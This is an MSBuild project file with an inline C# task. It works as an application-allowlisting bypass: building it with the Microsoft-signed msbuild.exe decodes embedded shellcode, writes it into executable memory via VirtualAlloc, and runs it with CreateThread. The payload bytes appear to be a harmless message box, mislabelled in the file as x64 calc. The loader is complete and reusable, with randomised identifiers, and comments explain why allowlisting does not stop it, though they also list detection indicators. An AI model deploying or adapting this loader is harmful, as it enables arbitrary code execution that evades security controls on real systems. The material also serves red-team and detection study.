shellCodeTest_msbuild.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
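<!-- This inline task compiles and executes the embedded C# code inside the MSBuild process when the project is built (CodeTaskFactory). The code therefore runs under the Microsoft-signed msbuild.exe, so an application-allowlisting policy that trusts that binary does not block it; the usual detection point is msbuild.exe building project files outside normal developer or build-server workflows. -->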
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe ShellCodeInjector.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Evan Pena, Twitter: @evan_pena2003 -->
<!-- Idea taken from http://subt0x10.blogspot.ie/2016/09/bypassing-application-whitelisting.html-->
<!-- License: BSD 3-Clause -->
<!-- Only target in this project, and the Project element sets no DefaultTargets attribute, so building the file without naming a target runs it. Its single step invokes the FragmentExample inline task declared in the UsingTask element. -->
<Target Name="ShellCodeInjector">
<FragmentExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
using System.IO;
public class FragmentExample : Task, ITask
{
    // MSBuild task wrapper: Execute() is what the <FragmentExample /> element in the
    // target runs. It contains no build logic of its own and only forwards to
    // ShellCodeInject.Main().
    public override bool Execute()
    {
        // Runs the injector synchronously inside the MSBuild process.
        ShellCodeInject.Main();

        // Success is reported unconditionally; Main() returns nothing, so a failed
        // allocation or thread creation is not reflected in the build result.
        bool taskSucceeded = true;
        return taskSucceeded;
    }
}
// In-process native code runner used by the inline MSBuild task.
// Main() decodes a hard-coded hex string into bytes, copies them into memory obtained
// from kernel32!VirtualAlloc, starts a thread at that address with kernel32!CreateThread
// and waits for it with kernel32!WaitForSingleObject. The remaining methods are plain
// hex-string helpers.
// Analyst note: the P/Invoke parameter names and several locals are random-looking
// identifiers (presumably machine-generated), so name-based signatures are unreliable;
// the VirtualAlloc -> Marshal.Copy -> CreateThread sequence is the stable indicator.
public class ShellCodeInject
{
// kernel32 imports. Parameters are declared positionally; their names carry no meaning.
[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(UInt32 JWmoIlFhPkGN, UInt32 UzWUXeiqddon, UInt32 szYzablY, UInt32 GXqpQXZYHpUiQ);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 cfYPJVtsoTj, UInt32 BzaNozPQLx, IntPtr YcjYxbv, IntPtr FmjdKEI, UInt32 WalIOQWiqTD, ref UInt32 VmRrcdmoX);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr xGtvlmms, UInt32 TgXuJhLpycZ);
// Decodes the embedded payload and runs it on a new thread in the current process.
// No return value is checked: a failed VirtualAlloc or CreateThread is not detected here.
public static void Main()
{
// Original label: x64 Calc Shellcode
// NOTE(review): the label does not appear to match the bytes. The string contains the
// ASCII fragments "LoadLibraryA", "user32", "MessageBoxA", "Hello World!" and
// "ExitProcess" and opens with an fs:[0x30] access, which looks like a 32-bit
// message-box payload rather than 64-bit calc. Confirm before relying on the label.
string strShellCode = InputToByteArrayString("0x33,0xc9,0x64,0x8b,0x49,0x30,0x8b,0x49,0x0c,0x8b,0x49,0x1c,0x8b,0x59,0x08,0x8b,0x41,0x20,0x8b,0x09,0x80,0x78,0x0c,0x33,0x75,0xf2,0x8b,0xeb,0x03,0x6d,0x3c,0x8b,0x6d,0x78,0x03,0xeb,0x8b,0x45,0x20,0x03,0xc3,0x33,0xd2,0x8b,0x34,0x90,0x03,0xf3,0x42,0x81,0x3e,0x47,0x65,0x74,0x50,0x75,0xf2,0x81,0x7e,0x04,0x72,0x6f,0x63,0x41,0x75,0xe9,0x8b,0x75,0x24,0x03,0xf3,0x66,0x8b,0x14,0x56,0x8b,0x75,0x1c,0x03,0xf3,0x8b,0x74,0x96,0xfc,0x03,0xf3,0x33,0xff,0x57,0x68,0x61,0x72,0x79,0x41,0x68,0x4c,0x69,0x62,0x72,0x68,0x4c,0x6f,0x61,0x64,0x54,0x53,0xff,0xd6,0x33,0xc9,0x57,0x66,0xb9,0x33,0x32,0x51,0x68,0x75,0x73,0x65,0x72,0x54,0xff,0xd0,0x57,0x68,0x6f,0x78,0x41,0x01,0xfe,0x4c,0x24,0x03,0x68,0x61,0x67,0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x54,0x50,0xff,0xd6,0x57,0x68,0x72,0x6c,0x64,0x21,0x68,0x6f,0x20,0x57,0x6f,0x68,0x48,0x65,0x6c,0x6c,0x8b,0xcc,0x57,0x57,0x51,0x57,0xff,0xd0,0x57,0x68,0x65,0x73,0x73,0x01,0xfe,0x4c,0x24,0x03,0x68,0x50,0x72,0x6f,0x63,0x68,0x45,0x78,0x69,0x74,0x54,0x53,0xff,0xd6,0x57,0xff,0xd0");
// 0x1000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE: the region is writable and
// executable at the same time, which is the allocation pattern endpoint telemetry
// commonly alerts on. The size passed is the length of the hex string, i.e. twice the
// number of payload bytes.
IntPtr ITGMyKKAUUm = VirtualAlloc(0,(UInt32)strShellCode.Length, 0x1000, 0x40);
byte[] shellcode = StringToByteArray(strShellCode);
// Copies the decoded bytes from the managed array into the native allocation.
Marshal.Copy(shellcode, 0, ITGMyKKAUUm, shellcode.Length);
// Thread handle, thread-id output and the (null) thread argument.
IntPtr DYtvdEXCykZ = IntPtr.Zero; UInt32 UgAJRevmsLwnO = 0; IntPtr qhaCJWwoK = IntPtr.Zero;
// Start address is the allocation itself; creation flags are 0, so the thread starts at once.
DYtvdEXCykZ = CreateThread(0, 0, ITGMyKKAUUm, qhaCJWwoK, 0, ref UgAJRevmsLwnO);
// 0xFFFFFFFF is INFINITE: the MSBuild task blocks here until the thread exits.
WaitForSingleObject(DYtvdEXCykZ, 0xFFFFFFFF);
}
// Turns a "0x33,0xc9,..." style list into one contiguous hex string by removing every
// "0x" and every comma. Nothing else (for example whitespace) is stripped.
public static string InputToByteArrayString(string input)
{
string strShellCode = input.Replace("0x", "");
strShellCode = strShellCode.Replace(",", "");
return strShellCode;
}
// Parses a hex string two characters at a time into a byte array.
// The input length is not validated: an odd length makes the final Substring(i, 2)
// call throw, and a non-hex pair makes Convert.ToByte throw.
public static byte[] StringToByteArray(String hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
// Formats a byte array as lowercase two-digit hex with no separators.
// Not called anywhere in this file.
public static string ByteArrayToString(byte[] ba)
{
StringBuilder hex = new StringBuilder(ba.Length * 2);
foreach (byte b in ba)
hex.AppendFormat("{0:x2}", b);
return hex.ToString();
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>